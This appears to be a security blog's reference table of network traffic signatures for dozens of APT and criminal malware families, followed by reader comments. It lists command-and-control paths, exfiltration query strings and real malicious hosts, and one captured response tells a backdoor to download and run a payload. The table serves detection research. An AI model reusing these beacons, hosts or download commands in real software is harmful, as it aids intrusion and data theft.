APTMiniASPGET/device_asp?device_t=&key=&device_id=&cv=
APTMiniASPGET/record.asp?device_t= &key=&device_id=&cv=&result=
APTMinidukePOST/index.php
APTMiragePOST/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow
APTMirage - later varGET/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg
CRIMEMoney loaderGET/get_xml?file_id=25227372
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
APTMongalGET/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000
APTMurcyGET/150828
APTNetravlerGET/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT
APTNetravlerGET/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt
APTNetravlerGET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end
/nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1-
APTNfLogGET/IElog/TestURL.asp HTTP/1.0
APTNfLogPOST/NfLog/Nfile.asp
APTNTESSESSGET/6K8gL8.html
APTPNG trojanGET/index.htm
APTPoison IvyGET256 bytes of seemingly random data after a successful
TCP handshake, then 48 byte “keep-alive” requests
APTRedOctober AuthInfoPOSThttp://%s:%s%s
APTRedOctober SysinfoPOST/cgi-bin/nt/sk
APTRegSubDatPOST/5501000000/log
APTSanny / Win32.DawsPOST/write.php
APTSeasaltGET/postinfo.html
APTSofacyPOST/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
APTSofacyPOST/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
CRIMESrizbiGET/cb_4.exe
CRIMEStabuniqPOST/rssnews.php
APTSykipot / WyksolGET/kys_allowget.asp?namegetkys.kys
APTTaidoorGET/apzsr.php?id=021793111D309GE67E
APTTarsip EclipseGET/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
APTTarsip MoonGET/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230
CRIMETbot torn
CRIMETinba aka ZusyPOST/h/index.php
APTVinselfPOST/w880/T19R17Q16/12010L11014
CRIMEVobfusGET/XEuPCLrf?e
APTWEBC2-BolidGET/firefox.html
APTWEBC2-CloverGET/Default.asp
APTWEBC2-CSONGET/Default.aspx?INDEX=<10_random_characters>
APTWEBC2-CSON Response to commandsPOST/Default.aspx?ID=IMNQRSSRXK
APTWEBC2-HEADGET/
APTWEBC2-TableGET/order.htm
CRIMEXpajPOST/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
APTXtreme RatGET/1234567890.functions
APTXtreme RatGET/1234567890.functions
CRIMEZeus GameoverGET/search.php?page=73a07bcb51f4be71
CRIMEBitcoinMinerPOST{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
CRIMEBlazebotIRCNICK USA|94576
USER vtptdwd 0 0 :USA|94576
CRIMENurjax AdwareGET/services/rules.txt?dummy=916
CRIMETosctGETY3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV
CRIMENocposGET POST/check/echo
/check
CRIMEOnionDukeGET/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=
s/sysinfo_7.php
/forum/phpBB3/prx_26.php
APTLagulon (Operation Cleaver)POST/contador/server.php
/i/server.php
/includes/server.php
APT?MedusaPOST%s/bbc_mirror/%s/search?id=%s
/CNN_Mirror/EN/%s/search?id=%s
|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00
CRIMEToopuGET/toopu.png
/%s:1048%s
/num3.html
/web/get_ad3.asp?type=loadall&machinename= -6C78A9C3&cr=yes
/num3_51la.asp
CRIMETwerkinGET/classes/functions.php?functionname=online
/classes/functions.php?functionname=getupdates
/classes/functions.php?functionname=getcommand
CRIMETzeeBot / TinyZBotPOST/checkupdate.asmx
CRIMEXLS URLDownload ToFileA function for DridexGET/koh/mui.php
CRIMEQuervar / Induc.C / DorifelGET/js/way.php?00021708&pin=7DF38AD66C78A9C3
/404/way.php?00038F50&pin=7DF38AD66C78A9C3
/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
/1.php?JXU9WXFG&pin=DEC09603F4CEFD80
CRIMEFeidowns downloader / Kilim (?) / CracktoolsGETyeniadmin.php?os=WindowsXP
/yeniadmin.php?os=Windows7&osbit=64&antiv
/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI
http://whos.amung.us/pingjs/?k=yenikazi
CRIMEGameVance AdwareGET/aj/updtah.php
CRIMEOpenShopper AdwareGET//mmsv/Access3.php
//opendb/mmsv.php
//mmsv/Access2.php
/opapp/postmedia1/Update.dat
/opapp/postmedia1/OKUpdate.exe
CRIMESoftPulse AdwareGET/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D
CRIMEFakeAVGET/[...]/load.php?file=uploader
/[...]/load.php?file=grabbers
/[…]/load.php?file=1
/ohwgx3kiTh/document.doc
/ohwgx3kiTh/load.php?file=0
CRIMEWauchos (download by Zbot of Cridex)POST/ssdc32716372/file.php
/auto*.it/*/jeve.exe
//dd*.ru/old.exe
CRIMEBlackenergy DDos BotPOSTid=[bot_id]&bid=[base64_encoded_build_
id]&dv=[x]&mv=[y]&dpv=[z]
id=[bot_id_sha1]&bid=[base64_encoded_build_
id]&nm=[x]&cn=[y]&num=[z]
The only major difference is that the id field contain just
the hash instead of the actual string
CRIMEAlurewo / Alureon pay per clickGET/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5
CRIMEOSX WirelurkerGETmac/getversion.php?sn=
CRIMESystweak Adware - Systweak RegClean Pro & Advanced System ProtectorGET/getipaddress.asp
CRIMEMPlug / Multiplug AdwareGET/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&
page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7
371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436
02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E
+L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro
w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%
2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+
-+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod
e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_
redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo
ut_id= 8&project_name=TusFiles&uuid=%252A
CRIMENemucod JSGET/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939
1
CRIMEAndromeda / WauchosPOST/and/gate.php
CRIMEPoweliks click-fraudGET/click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0
CRIMEPoweliks click-fraudGET/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9
CRIMEYoddos / Darkshell / YoYoDDoS75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........
APTCobra / TurlaPOST/%s/%s?
uid=%d&context=%s&mode=text&data=%s
APTPandaPOST/forum/login.cgi
APTPandaPOST/Photos/Query.cgi?loginid=
APTAided FrameGET/img/js.php
APTScanbox Watering hole frameworkPOST/i/recv.php
CRIMEBlackenergy DDos BotGET/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
APTSyria Twitter. apkPOST/contacts
APTTinyBaron / Miniduke / CosmicDukeGET /modules/db/mgr.php?
/modules/db/mgr.php?F=3?
CRIME?MoureGET /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
/HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k
/HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n
/G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr
/GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu
/FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k
CRIMEVundoGET /webhp
/wpad.dat
CRIME / APTLostdoor RATINFO||LostDoor-001|Remote PC|| Windows XP Professional|
APTProtux wormPOST" http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3
http://202.71.136.14:80/ggBwkFNqDu1869.avi
/newTroy.jpg"
/http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3
CRIMEConficker / Kido wormGET/ ip checking services
CRIMEDingu / ProxyGET /1.jpg
http://webemail.bounceme.net:8080/directget42.gif
CRIMEDyreGET/1/manualec.pdf
CRIMEZeusGET/ycJ2Jj7r4t3wc6y4/ali.jpg
CRIMECryptowallPOST/tpnofu223t8h8dl
CRIMECryptowallPOST /4175iq691v3l
GET /raw
CRIMEGalapoper / Tibs DownloaderGET /pic/tool.jpg
/pic/search.jpg
/pic/tibs.jpg
/pic/proxy.jpg
/pic/winlogon.jpg
APTWykcoresGET /279843
/279859
/280015
/287171
/315171
/110937
/111968
/113000
/114031
/115062
ADVAds - Zenovia Digital Exchange (not necessarily malicious)GET/?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs
CRIMEEsFury wormGEThttp://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA
http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT
CRIMEPornoAsset / LockEmAll RansomwareGET/a.php?f=647&e=2
CRIMEFakeAV Privacy CenterGET /dfgsdfsdf.php
/mf.php
/css/new-mobile.css
/js/wsjs.js
/js/caf.js
CRIMEZeus V2 (drop zone, config)GET / POST /panel3/gotobank.php
/panel3/ppnl3.exe
/panel3/ppnl3.bin
/ppnl3.bin
CRIMEBlathla / Cadro adwareGET/1.gif
CRIMEVundo / KrapPOST/
CRIMEVundo / KrapPOST/frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA
CRIMEVOlk botGET/WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1
User-Agent: vb wininet
Host: portalcinemark.us
CRIMEOficla / SasfisGET /21/download.php?expid=0&fid=1
/s/download.php?expid=4&fid=1
/l1/bb.php?v=200&id=554905388&b=9468674099&tm=3
/dmr/bb.php?v=200&id=554905388&b=OLD&tm=3
/np/load.php?spl=hcp&b=ff&o=xp&i=hcp
/phpbb/image2/cp.php?i=15
APTPingbedGET/default.htm
/default1.htm
/default2.htm
APTMinaps backdoorGET / POST /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko
/download/logo.png
/download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A
POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi
CRIMEQHost / Orsam / BicololoGET/stat/tuk/183

15 comments:

  1. This is exceptionally valuable to the community. Thanks for doing this.

    ReplyDelete
  2. Perfect idea!

    Do you have the intend to publish a kind of mailing list that inform us when your database is added?

    How you do when requests are crypted or GET/POST on other port than 80 ?

    Thanks

    ReplyDelete
    Replies
    1. HI there, no we plan it to be low maintenance - see pattern = add. Need to reference = visit the link. People have enough spam in their mailboxes and no easy way for us to deal with the mailings.
      Some of these are on port 443 and other.
      We might add port column but also see the links with publications - they show and explain much more than the table, which is just a lookup reference. thank you

      Delete
  3. Absolutely Spectacular!

    ReplyDelete
  4. Awesome stuff, seriously! Mila and Andre' - keep up the fantastic work!!!

    ReplyDelete
  5. Good stuff. Keep up the great work!!

    ReplyDelete
  6. The fact is that Malsubjects will continue to cause havoc in cyberspace using everything they have in their power. It is time that we all realize that we are fighting a cyberwar where in many cases the malsubjects are winning many of these battles. It’s about time we defend ourselves with ALL we’ve got!

    ReplyDelete
  7. I may have over looked it, but is the password for the newly downloadable pcaps posted anywhere?


    Thanks,

    ReplyDelete
    Replies
    1. you don't need a pass to download the spreadsheet itself - go to File - Save AS (might need to use gmail acct, not sure) but for the malware and pcap downloads - it is the same scheme as on Contagiodump.blogspot.com - please email Mila for the pass scheme (click on the name above in the post and replace (at) with @

      Delete
  8. Very useful, it's rare to find resources this good on APT

    ReplyDelete
  9. it's best pleasure to share the malware-pcap files for public. i have emailed you for the password. wish remail soon. thank you very much. thos pcap files will help me to get further study on the APT research.

    ReplyDelete
  10. Amazing resource! Thank you so much.

    ReplyDelete
  11. This is amazing, thank you.

    ReplyDelete
  12. Thank you so much for taking the time to share this information. A great read. I’ll certainly be back

    ReplyDelete